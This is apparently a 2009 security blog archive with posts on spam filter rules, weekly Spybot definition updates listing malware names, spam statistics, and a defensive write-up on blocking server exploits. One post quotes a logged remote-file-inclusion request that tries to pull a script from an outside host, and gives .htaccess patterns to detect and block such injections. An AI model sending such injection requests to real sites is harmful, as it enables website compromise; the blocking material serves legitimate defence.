[enabled],"Hidden ISO Subject","Hidden ISO or Ascii Subject",16711680,OR,Delete,Automatic,EntireHeader,containsRE,^Subject:[^\n]*?=?ISO-8859-[^\n]*?\n,EntireHeader,contains,"Subject: =?us-ascii?",EntireHeader,contains,"Subject: =?windows-1251?B?",EntireHeader,contains,"Subject: =?gb2312?B?"

If you don't trust the accuracy of my filter you should remove the word: Automatic, from the rule. This will cause the rule to only flag such messages as spam, matching the Hidden ISO rule, with a checkmark in the Delete column, in MailWasher Pro.

If you are reading this on a Windows computer you need anti-malware protection that operates as a "resident service" and monitors every file opened, saved, run or downloaded, plus scans website you try to visit for infected or hostile scripts or forced downloads. This will protect you against Bot infections, as long as the security program is updated regularly (daily is just barely acceptable anymore). I personally recommend Trend Micro Internet Security (PC-cillin and Pro versions) to perform these tasks. PC-cillin is updated with new malware and infected website information constantly, using "in-the-cloud" technology. Every Trend Micro paying subscriber is automatically protected as soon as a definition is sent to the "cloud" servers. Instead of loading down your computer with huge definitions files, the largest portion of the updates occur in the cloud and your PC is in contact with that secure cloud server all the ime you are online. Of course, you still get some updates downloaded to your PC, but not so many as to cause it to grind to a halt!

If you can't afford this kind of realtime, in the cloud protection, but must rely upon free anti virus and anti spyware applications, at least install Trend Micro's free utility called RUBotted. RUBotted will notify you if it detects Bot-like activity, or finds a known Bot in a quick scan. You would then be instructed to click on the link to scan your computer with the free Trend Micro Online Housecall scanner to remove the threat.This is a lot of user interaction, but hey, it's free!

Norton offers a more advanced tool that is similar to RUBotted, known as Norton Antibot. AntiBot costs $29.99 US per year for a subscription to updates and allows you to install it onto three PCs at no additional cost. It uses Active Behavioral-Based Analysis that stops and removes malicious bots before they can cause damage, turn you into a spammer, or steal personal information.

One note of good news for Srizbi Bot infected PC owners: Microsoft has updated the Malicious Software Removal Tool (MSRT), on Patch Tuesday, February 11, 2009, to detect and remove the Srizbi Bot infection.

Posted by Wiz at 3:48 PM | Permalink

back to top ^

If you are using "Spybot Search and Destroy" to protect your PC against spyware infections and haven't updated it this week, be aware that updates to the definition files were released on schedule, on Wednesday this week, as listed below. Spyware and other classes of malicious programs are altered constantly to avoid detection by anti-spyware programs. Since Spybot S&D updates are only released on a weekly schedule (on Wednesdays) it is imperative that you make it a point to check for and download updates every week, preferably on Wednesday evenings. After downloading all available updates (from the best responding download server in the list of server locations), immunize*, then scan for and remove any detected malware. If Spybot is unable to remove an active threat it will ask for permission to run before Windows starts during the next reboot. Spybot will then run a complete scan before your Windows desktop loads, removing malware that has not yet loaded into memory.

If you arrived here by searching for the name of some malware that may be on your computer and you are not currently using Spybot Search and Destroy, you can download the latest version from the Spybot Search and Destroy Multi-Lingual Landing Page. Choose your language, then use the link in the left sidebar to go to the downloads page. Download the program from your closest mirror server, install it, update it (Updates button), then follow the instructions below to detect and remove any malware that is on your PC.

If you see a program listed in the detections below, by name, you should assume that is is malware (with the possible exception of the PUP group, which is up to user discretion). All of the programs listed with a single + sign are updated detections, while a double ++ in front of it's name indicates a brand new detection. A number in parenthesis, following a malware name, indicates the number of variants included in that detection. These programs are dangerous to your computer, and/or personal security or privacy.

* After updating your Spybot S&D definitions, if they include new "immunization" definitions you need to click on the "Immunize" button, then, if the status line tells you that additional immunizations are possible, click on the Immunize link, near the top of the program. It has a green + sign in a button. If you don't do this the new immunizations against hostile ActiveX programs will not be applied. After immunizing with any new detections, run a scan for malware by clicking on the "Spybot Search & Destroy" button, on the left panel, then on the button with the magnifying glass icon, labeled: "Check For Problems."

Spybot Updates - published every Wednesday

Spybot Search and Destroy 1.6.2 was just released on January 26, 2009. This is probably going to be the last "maintenance release" before version 2.0 is released. It scans for threats about 4 times faster than previous versions and has an redesigned spyware removal engine. Upgrade now to Spybot S&D 1.6.2. The newest Virtumonde and Zlob threats require the anti malware engine in Spybot 1.6+ to effectively remove them.

Work is progressing rapidly on the upcoming version 2.0, of Spybot Search and Destroy. A preview of Spybot 2.0 will also be available as soon as servers have adjusted to the additional 1.6.2 release load. Version updates are discussed in my extended comments.

Additions made on February 11, 2009:

Hijackers
+ MyPoints

Malware (Includes rogue or fake anti-virus and anti-spyware programs and fake registry cleaners and fake security alerts, plus other nasty programs)
+ RapidAntivirus
+ Smitfraud-C.
+ Win32.TDSS.rtk
+ WinSpywareProtect
+ XPPoliceAntivirus

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
+ Live-Player
+ MyWay.MyWebSearch

Security
+ Microsoft.Windows.AppFirewallBypass

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors and Rootkits.)
+ KillAV
+ Speedrunner
+ Virtumonde
+ Virtumonde.sci
+ Virtumonde.sdn
+ Webshow
+ Win32.Agent.aiae
+ Win32.Agent.bakf
+ Win32.Agent.fbx
+ Win32.Bagle.av
+ Win32.Clicker.vp
+ Win32.Rbot.fx
+ Win32.Renos.ik
+ Zlob.Downloader.miu
+ Zlob.Downloader.ned
+ Zlob.Downloader.pit

Total: 1332704 fingerprints in 381260 rules for 4550 products.

The domain "Spywareinfo.com" was recently added to the HOSTS file updates (for redirection to 127.0.0.1), because the domain name expired and was purchased by spammers or malware distributers, in December 2008. It is now advertising a fake Spybot Search & Destroy, fake security scans and various malware downloads. The new Spywareinfo malware removal forum is located at: http://www.spywareinfoforum.com/

Note for Firefox users who saved links to the old spywareinfo website:
It has recently (Feb/09) been reported that in some versions of Spybot S&D, on some operating systems, if you have a link to the old spywareinfo website, now owned by purveyors of fake anti spyware products and scanners, "fixing" it will erase your entire Bookmarks.html file. This is being looked into right now and hopefully will be fixed real soon. In the meantime, if you use Firefox as your browser (which stores Favorite places as "Bookmarks") and after running a scan Spybot lists an infected bookmark with Spywareinfo as the culprit, uncheck that entry before fixing any other problems. You can manually edit your Firefox Bookmarks to remove the link to that website, or any similar compromised website.

In case you have noticed a slowdown in the scan times over the past few months, it's because the number of detection patterns used to detect malware has doubled since the release of Spybot S&D v1.6, in July 2008. Older versions of Spybot are no longer being updated and cannot deal with many of the new malware definitions and removal routines.

False positive detections reported or fixed this week:

A confirmed false positive was reported and fixed this week regarding the blocked domain myvnc.com. It was removed from the Restricted Sites Zone on Feb 11, 2009, in the optional "F/P" update.

A HOSTS file DSN block on the domain redtube.com was removed on September 17, 2008, but some users have not re-immunized their Spybot databases and that website is still blocked for them. Update your definitions, including new "immunizations," then use the "Immunize" button to apply the changes. Immunizing both adds and removes entries, as new threats are discovered or old threats are resolved (bad sites sometimes turn into good sites, or remove questionable downloads or links to malware).

Friendly advice:
Stop using Heuristics scans for now. There are too many false positives with this type of scan. You can rely upon the definitions scans a lot more than Heuristics.

"The default scan with Spybot S&D is more accurate and recommended over the single file scanner. Especially the heuristics part of the single file scanner is prone to false positives."

If you wish to report or discuss a possible false positive detection by Spybot S&D, please read this first.

Extended Comments

Malware Removal Guides

The good folks at Spybot S&D have started a new segment of their official forums, titled "Malware Removal Guides." Each week they intend to write a short self-help article to help you remove various common malware threats manually, or in conjunction with Spybot S&D. This should prove to be a very useful addition to the Spybot forums.

If you are still using Spybot S&D 1.3, or 1.4, update support is about to end and your computer will be at greater risk because of having out-dated definitions. Furthermore, older versions of Spybot are known to report lots of false positives, due to the advanced heuristic rules now found in the newer definition files.

If you are using any version older than 1.6 please upgrade to the current version of Spybot S&D, which is now 1.6.2, as soon as possible. New definitions for malware like the Virtumonde family of Trojans need the newer processing technologies introduced in version 1.6.0. Also, the number of malware definitions has more than doubled between July and December, 2008.

Virtumonde (also known as the Vundo Trojan) is a Trojan horse that is known to cause pop-ups and advertising for rogue anti-spyware programs. It also causes other problems, including performance degradation and denial of service with some websites including Google. It attaches itself to the operating system using phony Browser Helper Objects (BHOs) and .dll files attached to the Winlogon process and Windows Explorer.

Work is progressing at a steady pace on Spybot S&D version 2.0, thanks to an army of volunteer beta testers. The upcoming version will be modularized, with separate executables carrying out different detection and immunization tasks now performed by the main program file. This is expected to speed up the scanning times, which is becoming more strenuous with the rapid increase in the number of detections being developed by Team Spybot.

To benefit from these improvements, I recommend that you update to Spybot Search & Destroy 1.6.2, which is available through the update function integrated into the application as well as from the Spybot S&D download page. When version 2.0 is finally released you should follow the to-be-posted instructions and upgrade to that version.

If your computer gets stuck in a logon/logoff loop, after updating and scanning with the older versions of Spybot, visit this forum page for a solution, from Team Spybot.

Of continued concern to people who operate as Limited or Power Users for their daily browsing and email, Spybot Search and Destroy is still corrupting your less privileged accounts after you update it, immunize and scan from an Administrator level account. If, after doing these things, you log off the Administrator account and try to log into your Limited/Power User account, it may be corrupted and a generic desktop and start menu may appear. Don't panic! Your account and desktop can be restored by simply rebooting the computer. When you login after the reboot your previous settings will reappear. I don't know why this happens, but, stuff happens! It may be related to the relatively new rootkit detection added last year.

If you want to get direct assistance from Team Spybot, or their talented volunteers, visit the Spybot support forums, sign up for a user account and post your request for assistance. Be sure to read the rules before posting a question or reply.

If your computer is infected and you need help removing the threats, go to the Malware Removal Forums, at Safer Networking/Spybot.info. Again, read the rules before posting your request or logs! Do NOT inject your problem into somebody else's thread! Start a new topic.

Some people are confused by detections of Wild Tangent on their computers. Wild Tangent is detected as a PUP, meaning Potentially Unwanted Program, because it does send home some identifiable information about you and your computer. It ships with various games and screen savers and is a means of funding those programs. If you knowingly installed Wild Tangent and aren't worried about it, and don't wish to have Spybot repeatedly display it in scan results, do the following: Right click the WildTangent Product in the Scan result and select to "Ignore the product from further searches."

If Spybot flags a file on your computer that you believe is a false positive detection, use caution and check with the Spybot False Positives Forum before allowing it to be deleted. You can submit a report to the Spybot False Positives forum, after signing up for an account and reading about how to report false positives before submitting your report and request for analysis.

Posted by Wiz at 1:47 PM | Permalink

back to top ^

If you are using "Spybot Search and Destroy" to protect your PC against spyware infections and haven't updated it this week, be aware that updates to the definition files were released on schedule, on Wednesday this week, as listed below. Spyware and other classes of malicious programs are altered constantly to avoid detection by anti-spyware programs. Since Spybot S&D updates are only released on a weekly schedule (on Wednesdays) it is imperative that you make it a point to check for and download updates every week, preferably on Wednesday evenings. After downloading all available updates (from the best responding download server in the list of server locations), immunize*, then scan for and remove any detected malware. If Spybot is unable to remove an active threat it will ask for permission to run before Windows starts during the next reboot. Spybot will then run a complete scan before your Windows desktop loads, removing malware that has not yet loaded into memory.

If you arrived here by searching for the name of some malware that may be on your computer and you are not currently using Spybot Search and Destroy, you can download the latest version from the Spybot Search and Destroy Multi-Lingual Landing Page. Choose your language, then use the link in the left sidebar to go to the downloads page. Download the program from your closest mirror server, install it, update it (Updates button), then follow the instructions below to detect and remove any malware that is on your PC.

If you see a program listed in the detections below, by name, you should assume that is is malware (with the possible exception of the PUP group, which is up to user discretion). All of the programs listed with a single + sign are updated detections, while a double ++ in front of it's name indicates a brand new detection. A number in parenthesis, following a malware name, indicates the number of variants included in that detection. These programs are dangerous to your computer, and/or personal security or privacy.

* After updating your Spybot S&D definitions, if they include new "immunization" definitions you need to click on the "Immunize" button, then, if the status line tells you that additional immunizations are possible, click on the Immunize link, near the top of the program. It has a green + sign in a button. If you don't do this the new immunizations against hostile ActiveX programs will not be applied. After immunizing with any new detections, run a scan for malware by clicking on the "Spybot Search & Destroy" button, on the left panel, then on the button with the magnifying glass icon, labeled: "Check For Problems."

Spybot Updates - published every Wednesday

Spybot Search and Destroy 1.6.2 was just released on January 26, 2009. This is probably going to be the last "maintenance release" before version 2.0 is released. It scans for threats about 4 times faster than previous versions and has an redesigned spyware removal engine. Upgrade now to Spybot S&D 1.6.2. The newest Virtumonde and Zlob threats require the anti malware engine in Spybot 1.6+ to effectively remove them.

Work is progressing rapidly on the upcoming version 2.0, of Spybot Search and Destroy. A preview of Spybot 2.0 will also be available as soon as servers have adjusted to the additional 1.6.2 release load. Version updates are discussed in my extended comments.

Additions made on February 4, 2009:

Keyloggers
+ PerfectKeylogger

Malware (Includes rogue or fake anti-virus and anti-spyware programs and fake registry cleaners and fake security alerts, plus other nasty programs)
+ Banload
+ CMVideo
+ MalwareBot
+ RegSweep
+ Smitfraud-C.gp
+ TotalProtect2009
+ Win32.AutoRun.ey

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
+ Go-Astro

Security
+ Microsoft.Windows.AppFirewallBypass

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors and Rootkits.)
+ NeoControlRed
+ Virtumonde.sci
+ Virtumonde.sdn
+ Win32.Agent.bhcs
+ Win32.Agent.fbx
+ Win32.Bitar.a
+ Win32.ControlTotal.l
+ Win32.FraudLoad.cxj
+ Win32.Tibia.ci
+ Zlob.DNSChanger.Rtk
+ Zlob.Downloader.bit
+ Zlob.Downloader.ger

Total: 1317330 fingerprints in 376606 rules for 4544 products.

The domain "Spywareinfo.com" was recently added to the HOSTS file updates (for redirection to 127.0.0.1), because the domain name expired and was purchased by spammers or malware distributers, in December 2008. It is now advertising a fake Spybot Search & Destroy, fake security scans and various malware downloads. The new Spywareinfo malware removal forum is located at: http://www.spywareinfoforum.com/

In case you have noticed a slowdown in the scan times over the past few months, it's because the number of detection patterns used to detect malware has doubled since the release of Spybot S&D v1.6, in July 2008. Older versions of Spybot are no longer being updated and cannot deal with many of the new malware definitions and removal routines.

False positive detections reported or fixed this week:

Confirmed False heuristics hit on Symantec file nppbho.dll showing virtumonde. Fixed with today's updates.

Confirmed F/P Virtumonde.SCI detected on NAV Helper BHO. Fixed with today's updates.

Brontok.Ab in a Windows desktop ini file is under investigation right now, but is probably a F/P.

Stop using Heuristics scans for now. There are too many false positives with this type of scan. You can rely upon the definitions scans a lot more than Heuristics.

"The default scan with Spybot S&D is more accurate and recommended over the single file scanner. Especially the heuristics part of the single file scanner is prone to false positives."

If you wish to report or discuss a possible false positive detection by Spybot S&D, please read this first.

Extended Comments

Malware Removal Guides

The good folks at Spybot S&D have started a new segment of their official forums, titled "Malware Removal Guides." Each week they intend to write a short self-help article to help you remove various common malware threats manually, or in conjunction with Spybot S&D. This should prove to be a very useful addition to the Spybot forums.

If you are still using Spybot S&D 1.3, or 1.4, update support is about to end and your computer will be at greater risk because of having out-dated definitions. Furthermore, older versions of Spybot are known to report lots of false positives, due to the advanced heuristic rules now found in the newer definition files.

If you are using any version older than 1.6 please upgrade to the current version of Spybot S&D, which is now 1.6.2, as soon as possible. New definitions for malware like the Virtumonde family of Trojans need the newer processing technologies introduced in version 1.6.0. Also, the number of malware definitions has more than doubled between July and December, 2008.

Virtumonde (also known as the Vundo Trojan) is a Trojan horse that is known to cause pop-ups and advertising for rogue anti-spyware programs. It also causes other problems, including performance degradation and denial of service with some websites including Google. It attaches itself to the operating system using phony Browser Helper Objects (BHOs) and .dll files attached to the Winlogon process and Windows Explorer.

Work is progressing at a steady pace on Spybot S&D version 2.0, thanks to an army of volunteer beta testers. The upcoming version will be modularized, with separate executables carrying out different detection and immunization tasks now performed by the main program file. This is expected to speed up the scanning times, which is becoming more strenuous with the rapid increase in the number of detections being developed by Team Spybot.

To benefit from these improvements, I recommend that you update to Spybot Search & Destroy 1.6.2, which is available through the update function integrated into the application as well as from the Spybot S&D download page. When version 2.0 is finally released you should follow the to-be-posted instructions and upgrade to that version.

If your computer gets stuck in a logon/logoff loop, after updating and scanning with the older versions of Spybot, visit this forum page for a solution, from Team Spybot.

Of continued concern to people who operate as Limited or Power Users for their daily browsing and email, Spybot Search and Destroy is still corrupting your less privileged accounts after you update it, immunize and scan from an Administrator level account. If, after doing these things, you log off the Administrator account and try to log into your Limited/Power User account, it may be corrupted and a generic desktop and start menu may appear. Don't panic! Your account and desktop can be restored by simply rebooting the computer. When you login after the reboot your previous settings will reappear. I don't know why this happens, but, stuff happens! It may be related to the relatively new rootkit detection added last year.

If you want to get direct assistance from Team Spybot, or their talented volunteers, visit the Spybot support forums, sign up for a user account and post your request for assistance. Be sure to read the rules before posting a question or reply.

If your computer is infected and you need help removing the threats, go to the Malware Removal Forums, at Safer Networking/Spybot.info. Again, read the rules before posting your request or logs! Do NOT inject your problem into somebody else's thread! Start a new topic.

Some people are confused by detections of Wild Tangent on their computers. Wild Tangent is detected as a PUP, meaning Potentially Unwanted Program, because it does send home some identifiable information about you and your computer. It ships with various games and screen savers and is a means of funding those programs. If you knowingly installed Wild Tangent and aren't worried about it, and don't wish to have Spybot repeatedly display it in scan results, do the following: Right click the WildTangent Product in the Scan result and select to "Ignore the product from further searches."

If Spybot flags a file on your computer that you believe is a false positive detection, use caution and check with the Spybot False Positives Forum before allowing it to be deleted. You can submit a report to the Spybot False Positives forum, after signing up for an account and reading about how to report false positives before submitting your report and request for analysis.

Posted by Wiz at 5:39 PM | Permalink

back to top ^

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

Wow! Spam is down for another week, thanks to the efforts of some of our colleagues in the security field. Starting with the takedown of the colocation facility McColo, on November 11, 2008, levels of incoming messages MailWasher identified as spam have dropped dramatically. That company provided hosting space and maintenance for privately owned servers that were used by spammers to command and control spam-sending Botnets. Those spammers are rebuilding or replacing their Botnets as I type this, so let's not become complacent. In fact, I suspect that a huge new Botnet is currently being assembled, via the Conficker/Downadup Worm. More about this emerging threat will be in a forthcoming article.

Once again, with the main command and control servers being partially or fully offline, I urge all Windows computer owners and sys admins to install security applications that are capable of detecting SpamBot activity. Please do yourself a favor and protect your PCs against Bots with Norton AntiBot, or Trend Micro's free program called RUBotted.

Some of the top rated Internet security products now contain Bot detections and prevention components. These in include Symantec and Trend Micro Internet Security Suites. I wrote a blog article about detecting and removing Bots in December, 2008. You can also visit Microsoft's download center and grab a current copy of the Malicious Software Removal Tool and let it scan your computer for malware and Bots. It will remove any threats listed in the tool's database, which now include the widespread Conflicker/Downadup Worm. Microsoft has been at war with Botnets since September 2007 (when they took down much of the Storm Botnet) and has made a huge dent in their numbers. This tool is totally free and is updated once a month. It is regularly released on Patch Tuesdays.

Note, that I have re-enabled my pattern matching blacklist filters to automatically delete spam messages containing a forged From address matching either of these Regular Expressions: lin+met@+.de and kef+diz@+, in MailWasher Pro. These two blacklist rules alone caught 33% of this week's spam!

MailWasher Pro spam category breakdown for Jan 19 - Feb 1, 2009. Spam amounted to a measly 9% of my incoming email this week.

Blacklisted Domains/Senders: (by pattern matching wildcard rules like: lin+met@+.de and kef+diz@+)	33.33%!
Pills spam:	16.67%
HGH spam:	8.33%
Fake "Canadian Pharmacy" spam (fake Viagra, Cialis, etc):	8.33%
Subject All Capitals or No Subject: (Nigerian 419 and Lottery scams)	8.33%
Hidden ISO Subject:	8.33%
Nigerian 419 Scams:	8.33%
Blocked Countries, RIPE, LACNIC, APNIC:	8.33%

If you are reading this and wondering what you can do to reduce the huge volumes of spam emails that must be overwhelming your POP client inboxes, I recommend MailWasher Pro (with my downloadable custom filters) as an incoming email screener for your POP email program (Microsoft Outlook, Microsoft Outlook Express, Microsoft Live Mail, Eudora, Mozilla and other stand-alone email programs).

All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters, or if they made it through, was reported to SpamCop, of which I am a reporting member, and manually deleted. I never buy anything that is Spamvertised and recommend you don't either! Remember, almost all spam is now sent from compromised home or business PCs, zombies in various Botnets, all of which are controlled by criminals. If you purchase anything advertised in spam messages, you have given your credit or debit card information to the criminals behind that enterprise. If you are really lucky you will only be charged for the fake items you purchased, but, if not, you might find your credit limit used up, or your bank account emptied (for debit card transactions), by cyber criminals.

Also, unsubscribing through links in botnet-sent spam messages is futile, as you never opted-in, in the first place; your email address was captured by an email harvester on an infected computer belonging to somebody you corresponded with. Instead of receiving less spam as one might expect (by unsubscribing), all it does is confirm that your email address is active and you will see even more spam than before.

Another common way your email address may get harvested by spammers is if it appears in a large C.C. (Carbon Copy) list on a computer that gets Botnetted. Many people engage in forwarding messages among all their friends. Each time they forward chain letters their address gets added to the growing list of recipients (called Carbon Copy, or CC). If just one recipient of that message has an email harvesting malware infection, all of the email addresses listed in that message will be sent home to the spammer behind that spam run.

Smart folks who want to forward or send a message to multiple recipients use B.C.C. instead of C.C. Using B.C.C. hides all of the recipients from displaying. The To field will just show "Undisclosed Recipients" in a message sent using B.C.C. This is safest for you and your friends or mailing list. All email clients have a means of displaying a B.C.C. field.

Posted by Wiz at 12:05 AM | Permalink

back to top ^

Server exploits abound!

Enough is enough already! It's bad enough that I have to fend off the occasional exploit attempt against my main website, but 24 in one day, from the same IP address is something I can't ignore, and neither should anybody else who maintains a website. That IP address is 212.241.182.240, which is a dedicated server that belongs to Pipex Dedicated Hosting (and associates), in Great Britain (See Whois report). This is an exploited server and it is hostile to other servers and websites!

Here is a sample of just one of the many attacks launched by this server, against mine (I deactivated the hyperlink to the hostile script, substituting an * for a t):

212.241.182.240 - - [01/Feb/2009:02:44:23 -0800] "GET /?sIncPath=ht*p://kadin.or.id/mail/id1.txt?? HTTP/1.1" 403 137 "-" "Mozilla/5.0"

What's this all about, you ask? It's about somebody who is leasing a dedicated server and either knowingly or unknowingly using it to blast out hostile exploitation scripts against other servers. This exploit is trying to upload a file named id1.txt into my website, via some vulnerability in a script that might be running on it (didn't happen - see the 403 response). Normally I wouldn't even assume that the people leasing the server had any knowledge of such goings on, but this time something is different. In just about every other instance of script injection attempts, when I trace the IP to a server and try to access it, I usually see one of the following responses:

1. A website's home page (index.html, index.php, etc.)
2. A "Welcome to Apache" screen, for a new website on an Apache server
3. A Welcome to cPanel or WHM screen
4. A welcome screen for an unconfigured website hosted on a Windows IIS server
5. A 403 Forbidden message (someone doesn't want me poking around)
6. A message that no website has yet been configured on the server

Today, when I went to investigate the IP address that was spewing out 24 exploit attempts in one day, instead of one of the above listed typical responses, all I saw was a login field, requesting a user name and password. This is a password protected website and it is being used to exploit other websites and web servers. Nobody can access any of it's pages, or inject hostile scripts into it without logging in with the correct credentials. Maybe this server used a weak password and user name combination that was cracked with a dictionary or rainbow attack, or maybe the administrator was tricked into allowing a keylogger to infect his or her personal computer (used to login to his/her website), or maybe the owner is knowingly using this server to launch exploit attacks against other servers, like mine.

Whatever the case may be, this server is out to get us and if you run a website you may want to block it for your website's protection. I will give you several methods of denying access to this server and others launching similar exploits, in my extended comments.

How to block exploit injection attacks targeting your websites.

My websites are all hosted on an Apache web server, owned by a commercial web hosting company. Apache is the most widely deployed web server on the planet. Others include Microsoft Windows IIS servers, FreeBSB, Mac Server, Java Servers, Tomcat and a variety of lesser servers. The biggest differences between these servers is how one controls access to them. If your website is hosted on a Windows IIS Server, please contact your host or administrator for details on how to add unwanted IP addresses to the website's access control file.

In the case of dedicated, semi-dedicated, or VPS Apache type servers, running on Linux operating systems, anybody with "Root" access can install a special script that includes IP addresses that are included in an "APF" firewall rule. This is known as an "iptables firewall" and I happen to publish several blocklists in iptables format. One of those blocklists is the Iptables Exploited Servers Blocklist. By importing this file into the APF Firewall (your server administrator should know how to do this) you can deny all access to your server from other exploited servers. Ditto for the other blocklists I publish that contain Chinese, Korean, Russian and Nigerian IPs and CIDRs. Apply one or all of those blocklists and any IP covered by the ranges in the lists will be unable to access anything on your server. In fact, the server won't even respond to the requests. They go directly to the "bitbucket" (send to "null void," blackhole the request).

The above solution is only good for those who have total administrative control over a server. However, the majority of websites are hosted on "shared" servers, where numerous clients share the same operating system, hard drives, RAM and Database server. You (and I) have no control over the firewall that may or may not be in place to protect the server box you are hosted on. So, in order to control (deny) access to our individual websites we have to apply user allowed access controls. In the case of Apache servers these controls are applied via a special file named .htaccess. Note, that the file name has no prefix; it begins with a period. Files beginning with a period have a special meaning to web servers and may be hidden by default by FTP programs and sometimes by web file managers. If your website has a .htaccess file , but you cannot see it when you login to your control panel, or FTP program, you will have to unhide it. In FTP programs this is done by inputting the "file mask" -al. If you use a file manager there may be a link to display hidden files on the server (ask your web host).

If you have access to and permission to customize your .htaccess file (most hosting companies allow this now), you can download the existing file from your web server to your hard drive, then open it in Notepad, or your html editor, or whatever plain text editor you have installed. The file will contain text that is either a comment or a "directive." All of the items listed in .htaccess files are typed in plain text, with no special characters. Comments are preceded by # signs and are not interpreted. Comments should be on their own lines and not appended to directives. Directives are interpreted and must adhere to a specific form recognized by your Apache server software. One mistake in your typing can cause the server to stop responding and yield the dreaded Server 500 error. If you neglect the leading # sign before a text comment it will cause a 500 error, as Apache does not understand your comments (only codes it knows about). Always save a backup of the last working .htaccess file before making any changes. You will need it every now and then!

With these things in mind, lets proceed to some actual .htaccess codes that will deny access to anybody who launches a script injection script attack against your website.

One way to deny access is by copying the directives in one or more of my .htaccess blocklists and pasting them into your .htaccess file. Make sure you backup the previous file before saving the changed version. If you make a mistake, or your flavor of Apache doesn't like some of the codes, you will need to restore your old .htaccess immediately, from the backup file. There are a couple of ways to backup the existing file, including opening it in your text editor (Notepad is preferred) and Save As ".htaccess.txt" or similar, or renaming the existing file on the server to .htaccess1 (2, 3, etc), then upload the changed file. Go to one of your web pages immediately and ensure that it loads properly. If you get a 403 Forbidden message, or a Server 500 Error, undo the changes ASAP, by restoring the original file as .htaccess.

Alright, now that you know what to watch for in the errors department, here are some directives that will block not only IP addresses, but also bad behavior. The following directives are the ones I use to block script injection exploits, in my .htaccess file. Test these directives to ensure that they don't break any scripts you are using. Use them at your own risk, but be ready to restore your previous file if these directives cause a server hiccup!

RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/
RewriteRule .* - [F]

RewriteCond %{QUERY_STRING} DOCUMENT_ROOT [OR]
RewriteCond %{QUERY_STRING} .*=http.+ [NC,OR]
RewriteCond %{REQUEST_URI} %3C/scripts/.+\.php%3E [OR]
RewriteCond %{HTTP_REFERER} ^<script>window\.open.+$ [NC]
RewriteRule .* - [F]

Those are the safest all around directives I can publish in good conscience. There are other directives I use, but they might cause harm to some websites if they use the particular scripts that I block. The main item that is important in the above directives if the one that has a QUERY_STRING that includes (anything)=http(anything). That is how the majority of exploits are scripted. They are trying to upload a hostile file from another website into yours, via an unpatched, vulnerable html, php or asp extension page, or by breaking into an include file that is included in other files.

As for the IP address that started this article, here is how to block it: Pay careful attention to the "order" directive format, or else (500)!

<Files>
order deny,allow

deny from 212.241.182.240

# other IP addresses to "deny from" - like my exploited servers blocklist

# IP addresses to specifically allow, like the following example, just in case:
# Allow Google
allow from 64.68.80.0/21 64.233.160.0/19 66.249.64.0/19 72.14.192.0/18
</Files>

In the Files section shown above the "order" sequence dictates that "deny" items are processed first and "allow" items are processed last, with "allow" being the default action if nothing else is specified. Thus, if you do not specifically block an IP address it will be allowed by the "order deny,allow" directive. The allowed items are only needed to be sure that they are not blocked accidentally, when including a long blocklist of IP addresses and CIDR ranges. Note, the space after the word "order" but there are no spaces between "deny,allow" - this is vitally important syntax! order deny,allow

All of my .htaccess blocklist pages have complete directives sections ready for you to drop in to your .htaccess file as is, or, take the deny from lines as you need them and paste them in where you want them to go. Always test before deploying changes to your Apache website's .htaccess file!

Posted by Wiz at 1:23 PM | Permalink

back to top ^